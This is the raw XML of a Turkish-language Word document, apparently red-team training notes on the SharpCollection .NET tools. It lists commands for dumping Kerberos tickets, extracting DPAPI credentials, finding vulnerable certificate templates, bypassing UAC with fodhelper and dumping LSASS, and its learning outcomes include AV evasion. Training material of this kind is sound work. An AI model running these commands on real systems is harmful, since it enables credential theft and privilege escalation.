      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kerberos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ticket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rubeus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5361ACE9" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:r w:rsidRPr="002E41E1">
        <w:t xml:space="preserve">Rubeus.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="653357C9" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DPAPI </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>credential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>extract</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SharpDPAPI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5277CD15" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:r w:rsidRPr="002E41E1">
        <w:t xml:space="preserve">SharpDPAPI.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>triage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59037BB0" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📎</w:t>
      </w:r>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sertifika istismarı (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Certify</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ACFFB4" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4215CEAA" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:r w:rsidRPr="002E41E1">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Certify.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59A61D88" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>⚡</w:t>
      </w:r>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> UAC bypass (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SharpBypassUAC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490822F1" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:r w:rsidRPr="002E41E1">
        <w:t>SharpBypassUAC.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>method</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:t>fodhelper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="58316133" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> LSASS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SharpDump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140C0D57" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:r w:rsidRPr="002E41E1">
        <w:t>SharpDump.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04509B0E" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1"/>
    <w:p w14:paraId="2E605F85" w14:textId="24A4F17E" w:rsidR="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:r w:rsidRPr="002E41E1">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📷</w:t>
      </w:r>
      <w:r w:rsidRPr="002E41E1">
        <w:t xml:space="preserve"> 5. Örnek Terminal Çıktısı</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9F4712" w14:textId="04B4E0E9" w:rsidR="002E41E1" w:rsidRPr="002E41E1" w:rsidRDefault="002E41E1" w:rsidP="002E41E1">
      <w:r w:rsidRPr="002E41E1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A24FFEC" wp14:editId="55E1E414">
            <wp:extent cx="2937164" cy="2088351"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1542623648" name="Resim 1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23648" name="Resim 1" descr="metin, ekran görüntüsü, yazı tipi içeren bir resim&#10;&#10;Yapay zeka tarafından oluşturulmuş içerik yanlış olabilir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5979" cy="209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69C5" w14:textId="77777777" w:rsidR="002E41E1" w:rsidRDefault="002E41E1"/>
    <w:p w14:paraId="386960AD" w14:textId="77777777" w:rsidR="00C67DDB" w:rsidRDefault="00C67DDB" w:rsidP="00C67DDB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67DDB">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A567ED" w14:textId="06CE6E47" w:rsidR="00C67DDB" w:rsidRPr="00C67DDB" w:rsidRDefault="00C67DDB" w:rsidP="00C67DDB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67DDB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>. Öğrenim Kazanımları</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4290E2C9" w14:textId="77777777" w:rsidR="00C67DDB" w:rsidRPr="00C67DDB" w:rsidRDefault="00C67DDB" w:rsidP="00C67DDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67DDB">
        <w:t xml:space="preserve">.NET tabanlı </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C67DDB">
        <w:t>Red</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C67DDB">
        <w:t xml:space="preserve"> Team araçlarının kullanımına genel bakış</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B59243E" w14:textId="77777777" w:rsidR="00C67DDB" w:rsidRPr="00C67DDB" w:rsidRDefault="00C67DDB" w:rsidP="00C67DDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67DDB">
        <w:t>Hedef sistemde bilgi toplama, şifre çıkarma, yetki yükseltme tekniklerini öğrenme</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D03597" w14:textId="77777777" w:rsidR="00C67DDB" w:rsidRPr="00C67DDB" w:rsidRDefault="00C67DDB" w:rsidP="00C67DDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67DDB">
        <w:t>AV atlatma ve post-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C67DDB">
        <w:t>exploitation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C67DDB">
        <w:t xml:space="preserve"> mantığını kavrama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA4BE3F" w14:textId="77777777" w:rsidR="00C67DDB" w:rsidRPr="00C67DDB" w:rsidRDefault="00C67DDB" w:rsidP="00C67DDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67DDB">
        <w:t>Birden fazla aracın tek bir koleksiyonla nasıl yönetilebildiğini anlama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE6FC78" w14:textId="77777777" w:rsidR="00C67DDB" w:rsidRDefault="00C67DDB"/>
    <w:sectPr w:rsidR="00C67DD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E7130"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2076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2D56D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D3A4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0311311">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1159494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145"/>
    <w:rsid w:val="002E41E1"/>
    <w:rsid w:val="003003B6"/>
    <w:rsid w:val="00353A95"/>
    <w:rsid w:val="00681145"/>
    <w:rsid w:val="00C6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DCFFE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CF15FB7E-E025-4027-9C29-2370CB97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811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811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811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811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811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811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811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811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811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811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811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811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81145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81145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81145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81145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81145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81145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811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811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811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6811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6811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81145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81145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681145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811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681145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81145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3003B6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00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0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4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3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195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10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46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5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6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6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5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4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2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2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1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19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langvik/SharpCollecti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D101F-0421-4C3F-A9C5-5D46C369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dır Özaydoğdu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bahadır Özaydoğdu</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-28T08:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-28T09:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>